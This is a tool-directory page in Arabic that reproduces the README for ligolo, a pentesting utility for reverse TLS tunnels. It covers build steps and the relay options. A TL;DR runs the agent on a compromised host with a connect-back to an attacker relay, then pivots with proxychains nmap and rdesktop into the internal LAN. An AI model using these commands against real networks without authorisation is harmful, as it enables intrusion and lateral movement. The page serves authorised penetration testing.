Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ligolo — النفق العكسي بسهولة لمختبرِي الاختراق، من مختبرِي الاختراق https://sysdream.com/ | Kitploit
أدوات/GitHubGitHub/sysdream/ligolo
الحركة الجانبيةاختبار الاختراقالفريق الأحمر
GitHubsysdream/ligolo

ligolo

النفق العكسي بسهولة لمختبرِي الاختراق، من مختبرِي الاختراق https://sysdream.com/

عرض المستودع
1.8k22710منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Ligolo : الأنفاق العكسية المبسطة لمختبرين الاختراق، من قبل مختبرين الاختراق

forthebadge forthebadge

Ligolo

جدول المحتويات

  • مقدمة
  • حالة الاستخدام
  • عرض سريع
  • الأداء
  • الاستخدام
    • الإعداد / الترجمة
    • كيفية الاستخدام؟
    • TL;DR
    • الخيارات
  • الميزات
  • أعمال قيد التنفيذ
  • الترخيص
  • الائتمانات

مقدمة

Ligolo هي أداة بسيطة وخفيفة لإنشاء أنفاق SOCKS5 أو TCP من اتصال عكسي بأمان تام (شهادة TLS بمنحنى إهليلجي).

إنها قابلة للمقارنة مع Meterpreter و Autoroute + Socks4a، ولكنها أكثر استقرارًا وسرعة.

حالة الاستخدام

لقد اخترقت خادم Windows / Linux / Mac أثناء تدقيقك الخارجي. هذا الخادم موجود داخل شبكة LAN وتريد إنشاء اتصالات بأجهزة أخرى على هذه الشبكة.

Ligolo يمكنه إعداد نفق للوصول إلى موارد الخادم الداخلي.

عرض سريع

إعادة توجيه اتصال RDP باستخدام Proxychains (WAN).

RDP

الأداء

هذه لقطة شاشة لاختبار سرعة بين مضيفين بسعة 100 ميجابايت/ثانية (ligolo / localrelay). قد يختلف الأداء اعتمادًا على تكوين النظام والشبكة.

Speedtest

الاستخدام

الإعداد / الترجمة

تأكد من تثبيت Go وتشغيله.

  1. احصل على Ligolo والتبعيات
root@kitploit:~
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. قم بإنشاء شهادات TLS ذاتية التوقيع (سيتم وضعها في مجلد certs)
root@kitploit:~
make certs TLS_HOST=example.com

ملاحظة: يمكنك أيضًا استخدام شهاداتك الخاصة باستخدام خيار TLS_CERT في make عند استدعاء build. مثال: make build-all TLS_CERT=certs/mycert.pem.

  1. البناء
  • 3.1. لجميع البنى
root@kitploit:~
make build-all
  • 3.2. (أو) للبنية الحالية
root@kitploit:~
make build

كيفية الاستخدام؟

Ligolo يتكون من وحدتين:

  • localrelay
  • ligolo

Localrelay مخصص للتشغيل على خادم التحكم (خادم المهاجم).

Ligolo هو البرنامج الذي يتم تشغيله على الكمبيوتر المستهدف.

بالنسبة لـ localrelay، يمكنك ترك الخيارات الافتراضية. سوف يستمع على كل واجهة على المنفذ 5555 وينتظر الاتصالات من ligolo (معامل -relayserver).

بالنسبة لـ ligolo، يجب عليك تحديد عنوان IP لخادم الترحيل (أو خادم الهجوم الخاص بك) باستخدام معامل -relayserver ip:port.

يمكنك استخدام خيار -h للمساعدة.

بمجرد إنشاء الاتصال بين Ligolo و LocalRelay، سيتم إعداد وكيل SOCKS5 على منفذ TCP 1080 على خادم الترحيل (يمكنك تغيير عنوان/منفذ TCP باستخدام خيار -localserver).

بعد ذلك، كل ما عليك فعله هو استخدام أداتك المفضلة (مثل Proxychains)، واستكشاف شبكة LAN الخاصة بالعميل.

TL;DR

على خادم الهجوم الخاص بك.

root@kitploit:~
./bin/localrelay_linux_amd64

على المضيف المخترق.

root@kitploit:~
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

بمجرد إنشاء الاتصال، قم بتعيين المعاملات التالية في ملف تكوين ProxyChains (على خادم الهجوم):

root@kitploit:~
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

استفد.

root@kitploit:~
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

الخيارات

خيارات Localrelay:

root@kitploit:~
Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

خيارات Ligolo:

root@kitploit:~
Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

الميزات

  • نفق TLS 1.3 مع تثبيت TLS
  • متعدد المنصات (Windows / Linux / Mac / ...)
  • تعدد الإرسال (اتصال TCP واحد لجميع التدفقات)
  • وكيل SOCKS5 أو مرحل بسيط

أعمال قيد التنفيذ

  • معالجة أفضل لانتهاء المهلة
  • دعم UDP لـ SOCKS5
  • تنفيذ mTLS

الترخيص

رخصة GNU العامة العامة الإصدار 3.0 (انظر LICENSING).

الائتمانات

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

تنزيل الأداة